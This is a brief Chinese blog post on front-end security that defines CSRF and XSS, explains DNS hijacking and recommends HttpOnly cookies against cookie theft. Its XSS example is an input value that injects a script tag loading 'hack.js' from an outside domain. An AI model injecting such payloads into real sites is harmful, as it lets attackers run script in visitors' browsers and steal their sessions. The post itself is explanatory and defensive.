前端安全

最新更新时间:2018年11月7日11:30:48
《猛戳-查看我的博客地图-总有你意想不到的惊喜》
概述

CSRF,Cross-Site Request Forgery,跨站点请求伪造
XSS,Cross-Site Scripting,跨站点脚本

域名劫持

域名劫持,Domain name hijacking,是互联网攻击的一种方式,通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的地址从而实现用户无法访问目标网站的目的。
如果知道该域名的真实IP地址,则可以直接用此IP代替域名后进行访问。比如访问谷歌 ,可以把访问改为http://216.239.53.99/ ,从而绕开域名劫持。
域名劫持只能在特定的网络范围内进行

XSS

产生原因:过于信任客户端提交的数据,如下,黑客可能会提交javascript代码

<input value = "get info <script type = 'text/javascript' src = 'http://www.wanshaobo.com/hack.js'></script>" />
  • 放置客户端盗取用户cookie的方案

将重要的cookie标记为http only, 这样的话Javascript 中的document.cookie语句就不能获取到cookie了.

参考

感谢阅读,欢迎评论^-^

打赏我吧^-^

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值